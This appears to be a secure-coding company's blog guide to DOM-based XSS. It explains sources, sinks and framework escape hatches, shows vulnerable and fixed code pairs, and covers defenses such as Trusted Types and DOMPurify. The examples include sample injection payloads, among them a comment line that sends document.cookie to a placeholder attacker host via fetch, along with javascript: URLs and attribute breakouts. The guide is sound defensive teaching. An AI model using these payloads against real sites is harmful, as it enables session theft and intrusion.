Back to Blog
OWASP

DOM-Based XSS: Sources, Sinks, and JavaScript Defenses

April 25, 202617 min readSecureCodingHub Team
sourcesink(taint)

Dom based cross site scripting is the XSS variant the server never sees. The malicious payload never appears in a request body, never lands in the response template, and never trips a server-side WAF. It lives entirely in the browser — read by client-side JavaScript from a source like location.hash or postMessage, then written into a sink like innerHTML or eval that hands the string to the HTML or JavaScript parser. This guide is the DOM-based sub-cluster of our wider cross-site scripting pillar: the source/sink taxonomy, the data-flow mental model, framework-specific gotchas in React, Vue, Angular, and Svelte, the SPA and hash-routing vectors, real-world dom based xss examples, the Trusted Types architectural fix, and the detection tooling that catches what code review misses.

What Is DOM-Based XSS — The Variant the Server Never Sees

Classical reflected and stored XSS share a structural property: the malicious string is, at some point, present in the HTTP response body that the server emits. A reflected payload appears in the URL, gets echoed into the response template, and arrives inside the HTML the server rendered. A stored payload sits in a database row, gets pulled into the rendering pipeline, and ships out the same way. In both cases the server is in a position to see the payload — and the defenses (template-engine output encoding, sanitization on rendering, WAF response inspection) all assume the server controls the rendering boundary.

Dom based cross site scripting breaks that assumption. The vulnerable code path is entirely client-side JavaScript: the payload arrives through a channel the server cannot inspect (the URL fragment after #, a postMessage from another window, the window.name of the current frame, a value previously stashed in localStorage) and is consumed by JavaScript after the page loads. The server's HTML is identical for every visitor; the injection happens in the DOM. A WAF sniffing request bodies never sees the payload because it was never in the request body. The canonical illustration: an attacker crafts https://victim.example/app#<img src=x onerror=alert(1)>, the victim's browser sends only the path and query to the server, and the fragment lives entirely in the client where vulnerable JavaScript reads it.

The class was first described formally by Amit Klein in 2005, before the SPA era made it dominant. With the rise of React, Vue, and Angular, DOM XSS is now the most common XSS variant in modern web architectures. The reflected and stored forms persist in legacy server-rendered code paths; the DOM form is where new bugs land in 2026.

Sources — Where Attacker-Controllable Data Enters the DOM

The DOM-XSS taxonomy is built around two primitives: sources, where untrusted data enters JavaScript, and sinks, where JavaScript hands strings to the parser. A vulnerability is a data flow from a source to a sink without sanitization in between. Recognizing the source list is the first half of the recognition skill.

URL-derived sources. location.hash is the canonical DOM-XSS source — the fragment is attacker-controllable through a crafted link, never sent to the server, and frequently consumed by client-side routers. location.search, location.pathname, and location.href all carry attacker-influenced data. document.URL, document.documentURI, and document.baseURI are aliases. document.referrer is fully attacker-controllable when the attacker hosts the previous page.

Cross-window messaging. postMessage is the API by which one window sends data to another; the message event exposes event.data, event.origin, and event.source. Without an origin allowlist on the handler, any page the victim opens (tab, iframe, popup) can send a message that the vulnerable handler will process. window.name persists across navigations and is set by any page that frames the victim — a long-known DOM-XSS source that survived popup blockers becoming standard.

Storage sources. document.cookie, localStorage, sessionStorage, and indexedDB all return strings the application previously stored. They become DOM-XSS sources whenever earlier code wrote attacker-controlled data into them — a stored-into-DOM chain that bypasses output encoding because the data now comes "from storage" rather than "from a parameter."

Network sources. Fetched JSON, the response of a fetch or XHR call, the body of a Server-Sent Event, a WebSocket message, and Workbox-cached responses are all DOM-XSS sources when the server's content is not strictly under the application's control. A third-party CMS, an unvetted CDN, or a compromised microservice produces JSON the SPA happily renders into innerHTML.

Sinks — Where Strings Become Code

Sinks are the second half of the taxonomy: the JavaScript APIs that hand strings to the HTML parser, the JavaScript parser, or the URL resolver in a way that allows code execution.

HTML-parsing sinks. element.innerHTML, element.outerHTML, element.insertAdjacentHTML, and document.write/document.writeln all parse the assigned string as HTML and create DOM nodes from any markup it contains. jQuery's .html(), .append(), .prepend(), .before(), .after(), and the constructor $(...) when called with HTML-looking strings invoke the HTML parser internally. Range.createContextualFragment and DOMParser.parseFromString with type text/html also parse HTML.

JavaScript-evaluating sinks. eval evaluates its argument as JavaScript directly. Function(...) compiles its argument as a function body. setTimeout and setInterval evaluate string arguments as JavaScript (the safe form passes a function reference instead). The "new Function" form, execScript in legacy IE contexts, and the javascript: URL handler all execute strings as code.

URL-context sinks. Assigning to location, location.href, location.assign, location.replace, or to the src/href/action/formaction attribute of a script-bearing or navigation-bearing element opens a URL. If the URL begins with javascript:, navigation executes the rest of the URL as JavaScript in the current origin. Setting iframe.src to a javascript: URL has the same effect.

The catalog isn't exhaustive — the WHATWG sink registry tracks the full list — but innerHTML, document.write, eval, setTimeout-string, and javascript:-URL navigation cover the vast majority of production DOM-XSS bugs.

The Data Flow — Source to Sink, No Server Roundtrip

A DOM-XSS bug is a path from a source to a sink with no sanitization in between. The pattern, in the simplest form: client-side JavaScript reads a value from location.hash, performs zero or near-zero validation, and writes it into element.innerHTML. The server is never involved. The bug exists even if the application is otherwise hardened, has a strict CSP for server-emitted scripts, sanitizes every server template, and runs through a WAF on every request.

The first vulnerable-versus-fixed pair below shows the canonical case — a hash-driven greeting widget on a single-page app:

// Vulnerable: location.hash flows directly into innerHTML
function showGreeting() {
  // URL like /app#<img src=x onerror=fetch('//evil.example/'+document.cookie)>
  const name = decodeURIComponent(location.hash.slice(1));
  document.querySelector('#greeting').innerHTML =
    `<h2>Welcome, ${name}!</h2>`;
}
window.addEventListener('hashchange', showGreeting);
showGreeting();

// The hash is attacker-controllable via a crafted link.
// The img tag is parsed by the HTML parser; the onerror handler
// fires immediately because src=x fails to load. The attacker now
// has script execution in the application's origin.
// Fixed: parse and validate, render text via textContent
function showGreeting() {
  const raw = decodeURIComponent(location.hash.slice(1));
  // Reject anything that isn't plain alphanumerics + spaces
  const safe = /^[\w\s.-]{1,64}$/.test(raw) ? raw : 'guest';

  const target = document.querySelector('#greeting');
  target.replaceChildren();
  const h2 = document.createElement('h2');
  h2.textContent = `Welcome, ${safe}!`;
  target.appendChild(h2);
}

// No HTML parser is invoked. The hash content is constrained to a
// safe alphabet; even an unconstrained value would be rendered as
// text via textContent and never reinterpreted as markup.

The fix relies on two principles: validate the source, and use a sink that does not invoke the parser. Either alone would prevent this specific bug; both together produce defense-in-depth against future code that might bypass one or the other. The source-to-sink mental model is the same one we apply across server-side injection — see our OWASP A03 injection developer guide for the broader pattern — but the source list and sink list are entirely different in the DOM context.

The second vulnerable-versus-fixed pair shows document.write, the legacy sink that renders the page synchronously and parses its argument as HTML:

// Vulnerable: document.write of a URL parameter
const params = new URLSearchParams(location.search);
const ref = params.get('ref') || '';
document.write(
  '<a href="' + ref + '">Continue to your referrer</a>'
);

// /page?ref=javascript:alert(document.domain) produces an <a> whose
// href executes JavaScript on click. /page?ref="><script>alert(1)<
// /script><a%20href=" breaks out of the attribute entirely.
// Fixed: avoid document.write; build the element, validate the URL
const params = new URLSearchParams(location.search);
const raw = params.get('ref') || '';

let safeUrl = '/';
try {
  const url = new URL(raw, location.origin);
  // Only http(s) protocols and same-origin destinations
  if ((url.protocol === 'https:' || url.protocol === 'http:')
      && url.origin === location.origin) {
    safeUrl = url.href;
  }
} catch { /* invalid URL — keep safeUrl = '/' */ }

const a = document.createElement('a');
a.href = safeUrl;
a.textContent = 'Continue to your referrer';
document.querySelector('#nav').appendChild(a);

// new URL() is the standardized parser for URLs; it rejects
// malformed input via thrown TypeError. The protocol allowlist
// neutralizes javascript:, data:, vbscript:, and similar sinks.

Both fixes share a structural move: replace string concatenation with explicit DOM construction, and validate the untrusted segment before it crosses any parser boundary. Once that pattern is internalized, most DOM-XSS sinks become recognizable in code review.

DOM XSS in Modern Frameworks

React, Vue, Angular, and Svelte all default to safe rendering: interpolated values pass through the framework's escaping layer and become text nodes, not markup. The DOM-XSS surface in these frameworks concentrates around the explicit escape hatches the framework provides for the legitimate-but-rare case of rendering pre-trusted HTML.

React's escape hatch is dangerouslySetInnerHTML, named to discourage casual use. The third vulnerable-versus-fixed pair below shows the canonical fix when rich-text rendering is genuinely required and the data may come from a URL fragment or any attacker-influenced source:

// Vulnerable: dangerouslySetInnerHTML with URL fragment data
import React from 'react';

function Banner() {
  const message = decodeURIComponent(location.hash.slice(1));
  return (
    <div
      className="banner"
      dangerouslySetInnerHTML={{ __html: message }}
    />
  );
}

// /app#<img src=x onerror=alert(1)> produces script execution.
// Fixed: DOMPurify with a strict allowlist (or strip HTML entirely)
import React, { useMemo } from 'react';
import DOMPurify from 'dompurify';

function Banner() {
  const message = decodeURIComponent(location.hash.slice(1));
  const safeHtml = useMemo(
    () => DOMPurify.sanitize(message, {
      ALLOWED_TAGS: ['b', 'i', 'em', 'strong'],
      ALLOWED_ATTR: [],
    }),
    [message]
  );
  return (
    <div
      className="banner"
      dangerouslySetInnerHTML={{ __html: safeHtml }}
    />
  );
}

// Or, if the message is plain text, skip dangerouslySetInnerHTML
// entirely:
//   return <div className="banner">{message}</div>
// React will escape it for HTML body context automatically.

Vue's equivalent is v-html, with the same semantics: the bound expression is parsed as HTML and inserted into the DOM. Use it only with sanitized output. Angular goes further: by default Angular's DomSanitizer strips dangerous content from [innerHTML] bindings. Developers explicitly opt out via bypassSecurityTrustHtml, bypassSecurityTrustScript, bypassSecurityTrustUrl, and friends — those bypasses are the high-signal grep target in any Angular code review. Svelte exposes @html for the same purpose with the same hazard. The pattern across all four: framework auto-escape eliminates the bulk of the class, the named escape hatch is the residual surface, and code review with a grep for the escape hatches catches most regressions before they ship.

The fourth pair shows jQuery, which remains in long-tail production code and whose convenience APIs are nearly all DOM-XSS sinks:

// Vulnerable: jQuery .html() with user-derived data
$('#search-results').html(
  '<p>Results for: ' + queryFromUrl + '</p>'
);

// $().html() invokes the HTML parser; the constructor $('<div>'+x+'</div>')
// also parses, as do .append, .prepend, .before, .after when given
// HTML-looking strings.
// Fixed: .text() for plain rendering, DOMPurify for rich text
$('#search-results').text('Results for: ' + queryFromUrl);

// Or, if HTML is genuinely needed:
$('#search-results').html(DOMPurify.sanitize(messageHtml));

// .text() never invokes the HTML parser; it inserts a text node.
// DOMPurify is the only client-side sanitizer this guide
// recommends — Cure53 maintains it and tracks mutation-XSS
// bypasses continuously.

SPA, Hash Routing, and Fragment-Driven App Vectors

Single-page apps introduced DOM-XSS surfaces that didn't meaningfully exist in server-rendered apps. Hash-based routing — the #/users/123 URL pattern that older SPA routers used to avoid full-page reloads — turns the URL fragment into a routing parameter. Naive routers concatenate route arguments into rendered HTML; crafted hash fragments inject markup. Modern routers (Vue Router history mode, React Router's data router, Angular Router, SvelteKit's router) default to history-API routing, which removes the fragment angle. But hash routing persists in older codebases, in static-hosted SPAs that cannot configure server-side fallbacks, and in embedded webviews where hash-based deep linking is simplest.

Beyond routing, SPAs render JSON from APIs, and that JSON becomes a DOM-XSS source whenever it carries attacker-controllable strings rendered via innerHTML or framework escape hatches. The migration from "server controls the rendered HTML" to "server emits JSON, client controls rendering" shifted the entire XSS surface into the client, and the discipline of treating every API response as untrusted at the rendering boundary is the SPA-era equivalent of treating every database row as untrusted (the lesson of stored XSS).

Real-World DOM XSS Examples

DOM-XSS bugs in production are common but less publicly documented than reflected and stored variants because the programs that surface them often involve internal admin tools, third-party scripts, and SaaS integrations whose details aren't published. Three patterns recur enough to recognize as canonical dom based xss examples.

WordPress plugin DOM sinks. The WordPress plugin ecosystem has produced many DOM-XSS findings, frequently in slider plugins, contact-form plugins, and analytics integrations that read URL parameters and inject them into innerHTML or document.write. Wordfence and Patchstack disclosure feeds carry several per quarter — typically rated medium-to-high severity, exploitable through a crafted link. The pattern is consistent: the plugin reads ?utm_source= or a similar tracking parameter on the client side and renders it without encoding into a banner or dashboard widget.

Third-party tag managers and analytics pixels. Tag managers (Google Tag Manager, Tealium, Adobe Launch) execute attacker-influenced templates that read URL parameters, cookies, dataLayer values, and postMessage data. A misconfigured tag — typically a "custom HTML" template with an unsanitized data-layer interpolation — becomes a DOM-XSS surface across every page that loads the tag. The vector is high-impact because tag manager scripts run on every page; a single bad tag affects the entire site.

postMessage handlers without origin allowlists. The fifth vulnerable-versus-fixed pair below shows a pattern that has appeared across many SaaS embed widgets and OAuth popups — a parent window receives messages from a child iframe, processes them, and writes the data into the DOM without validating the message origin:

// Vulnerable: postMessage handler trusts every sender
window.addEventListener('message', (event) => {
  // No origin check, no data shape validation
  document.querySelector('#widget').innerHTML = event.data.html;
  if (event.data.callback) {
    eval(event.data.callback); // double sin
  }
});

// Any page the victim opens — in a popup, in an iframe, in a tab
// pointed at the victim by a malicious link — can postMessage to
// the victim's window and trigger script execution.
// Fixed: origin allowlist + shape validation + safe rendering
const TRUSTED_ORIGINS = new Set([
  'https://widgets.example.com',
  'https://embed.example.com',
]);

window.addEventListener('message', (event) => {
  if (!TRUSTED_ORIGINS.has(event.origin)) return;
  if (typeof event.data !== 'object' || event.data === null) return;
  if (typeof event.data.text !== 'string') return;
  if (event.data.text.length > 500) return;

  // Render as text, no parser invocation
  document.querySelector('#widget').textContent = event.data.text;

  // Never eval. Dispatch via a fixed handler map instead:
  const action = event.data.action;
  const handlers = { close: closeWidget, refresh: refreshWidget };
  if (Object.hasOwn(handlers, action)) handlers[action]();
});

// Origin check rejects messages from any window not on the
// allowlist. Shape validation rejects malformed payloads.
// textContent renders without parsing. The action dispatch uses
// a fixed handler map rather than dynamic evaluation.

Mitigation — Trusted Types, DOMPurify, Safe Parsers, Framework Discipline

The DOM-XSS mitigation stack layers four controls. Each catches a different slice of the class; the layering is what produces strong coverage.

Trusted Types. The Trusted Types API, standardized in Chromium browsers since 2020 and shipped to stable Firefox in 2025, requires DOM sinks to receive Trusted Type objects rather than strings. With Trusted Types enforced via the CSP directive require-trusted-types-for 'script', an assignment like element.innerHTML = userInput throws a TypeError — the assignment requires a TrustedHTML object produced by an explicitly registered policy. The architectural effect is dramatic: the application's DOM-XSS surface narrows from "every innerHTML, document.write, eval, setTimeout-string, and javascript:-URL navigation in the codebase" to "the Trusted Types policy registrations" — a much smaller surface, registered in one or two well-known places, auditable in a single code review.

<!-- Server response header -->
Content-Security-Policy:
  require-trusted-types-for 'script';
  trusted-types app-policy dompurify;
// Application code registers a single safe policy, used everywhere
const sanitize = trustedTypes.createPolicy('app-policy', {
  createHTML: (input) => DOMPurify.sanitize(input, {
    ALLOWED_TAGS: ['b','i','em','strong','p','a'],
    ALLOWED_ATTR: ['href'],
  }),
});

// Every innerHTML assignment now flows through the policy
element.innerHTML = sanitize.createHTML(userHtml);

// Naked string assignment throws:
//   element.innerHTML = userHtml; // TypeError

Trusted Types defines three types — TrustedHTML, TrustedScript, TrustedScriptURL — and the CSP directive enforces the policy across HTML, JavaScript, and script-URL sinks respectively. The migration cost is real but bounded: legacy code that assigned raw strings to innerHTML must route through the policy, and code review enforces that no new sites bypass it.

DOMPurify. Where rich-text rendering is genuinely required, DOMPurify is the recommended sanitizer. Maintained by Cure53 and tracking the mutation-XSS bypass literature continuously, DOMPurify parses the input as HTML, walks the DOM applying an allowlist of tags and attributes, strips dangerous URI schemes, and serializes the result. Roll-your-own sanitizers fail predictably to mutation XSS; DOMPurify does not.

Safe URL parsers. The new URL(input, base) constructor is the standardized parser for URLs. Code that constructs URLs from input — for navigation, for href assignment, for fetch — should pass the input through new URL(), validate the resulting protocol against an allowlist (https:, http:, often mailto:), and reject everything else. The pattern eliminates javascript:, data:, vbscript:, and the long tail of unusual schemes that browsers may interpret.

Framework escape-hatch discipline. Every dangerouslySetInnerHTML, v-html, [innerHTML], {@html}, and Angular bypassSecurityTrust* call is a code-review finding that requires a documented justification and a sanitization step. The Trusted Types layer eliminates the surface architecturally; framework discipline eliminates it culturally; DOMPurify eliminates it tactically. The combination produces XSS-free SPA code as a default state rather than as a goal.

Detection — DOM Invader, Coverage Tool, Static Analysis

Detection of DOM XSS runs across a different tool stack than reflected/stored XSS because the bug lives entirely client-side and never appears in the server's view of the application.

Burp DOM Invader. The DOM Invader extension that ships with Burp Suite instruments the browser to track tainted strings from sources to sinks. The extension marks every value read from a known DOM source, propagates the taint through string operations and JSON parsing, and reports when a tainted string reaches a known DOM sink. The output is a high-signal list of DOM-XSS surfaces in the running application — the closest thing to "automatic DOM XSS scanning" that exists in 2026.

Browser DevTools Coverage tool. The Coverage panel in Chromium DevTools shows which JavaScript code actually executed during a session. Combined with manual fuzzing through DOM sources, the Coverage data reveals which client-side handlers are wired to which DOM events — the routes through the codebase that an attacker can reach. Coverage is not a vulnerability scanner, but it makes the dynamic exploration phase of DOM-XSS testing systematic.

Static analysis with sink-pattern rules. CodeQL, Semgrep, Snyk Code, and SonarQube ship rule packs that flag innerHTML/outerHTML/document.write/eval assignments with non-static input, dangerouslySetInnerHTML props with non-sanitized values, jQuery .html()/.append() calls with variable arguments, and the React/Vue/Angular/Svelte escape hatches in general. The rule packs catch the syntactic patterns reliably; they over-flag inputs that have upstream sanitization the scanner cannot prove. Tuning the rules and combining with an IAST agent is the pattern that keeps signal-to-noise high — see our IAST vs DAST vs SAST comparison guide.

Code review with a DOM-XSS lens. Every PR that touches client-side rendering includes an explicit review for source-to-sink flow. Grep for the sink list (innerHTML, outerHTML, insertAdjacentHTML, document.write, eval, setTimeout with string, Function constructor, dangerouslySetInnerHTML, v-html, [innerHTML], {@html}, bypassSecurityTrust, .html, .append, .prepend, .before, .after) catches the surface mechanically. The reviewer's job is then to trace each hit back to the data source and confirm that either the data is statically safe, or the data flows through Trusted Types/DOMPurify, or the data is constrained by an allowlist. Our secure code review best practices guide covers the broader review discipline; for XSS-specific review, the sink-grep is the highest-leverage habit.

The relationship between DOM XSS and the other XSS variants — and the shared defense-in-depth that sits above all three — is covered in our pillar cross-site scripting developer guide, with deeper dives into the reflected variant, the stored variant, and the XSS prevention defense-in-depth playbook.

· OWASP A03 · DOM XSS · DEVELOPER ENABLEMENT ·

Source-to-Sink Fluency Beats Sink-by-Sink Patching.

A scanner that flags an unsafe innerHTML assignment is better than discovering the bug six months later in a bug bounty report — but neither matches a developer who recognizes the source-to-sink flow before writing the assignment in the first place. SecureCodingHub builds the Trusted Types, framework escape-hatch, and source/sink mental model that turns DOM-based XSS from a recurring scanner finding into something developers catch themselves at code-review time. If your team ships single-page apps and is tired of every pentest producing another DOM-XSS report, we'd be glad to show you how the program changes the input side of that pipeline.

See the Platform

Closing — DOM XSS Is a Mental Model, Not a Pattern Match

The DOM-XSS source list and sink list are finite. A developer who has memorized them can grep a codebase mechanically, find the obvious cases, and patch them. That's the floor of competence, not the ceiling. The harder cases — the ones that ship to production despite the grep — are where the source isn't on the canonical list (a third-party SDK exposing attacker-influenced data through an unfamiliar API), where the sink isn't either (a wrapper library that internally calls innerHTML through a name the grep doesn't know), or where the path between them is long enough that taint isn't obvious in any single function.

The mental model that catches these is the source-to-sink flow framing applied generally: at every boundary where JavaScript receives data from outside the application's static code, treat the data as tainted; at every boundary where JavaScript hands a string to the HTML parser, the JavaScript parser, or the URL resolver, treat the sink as a potential injection point. Trusted Types makes the framing structural — the policy registration is the boundary, and crossing it without sanitization is impossible by construction. DOMPurify and safe URL parsers make the framing tactical where Trusted Types isn't yet in place. Framework escape-hatch discipline and code review make it cultural. None of these layers is exotic; the institutional commitment to apply them consistently is the difference between a program that detects DOM XSS in CI and a program that no longer writes DOM XSS in the first place.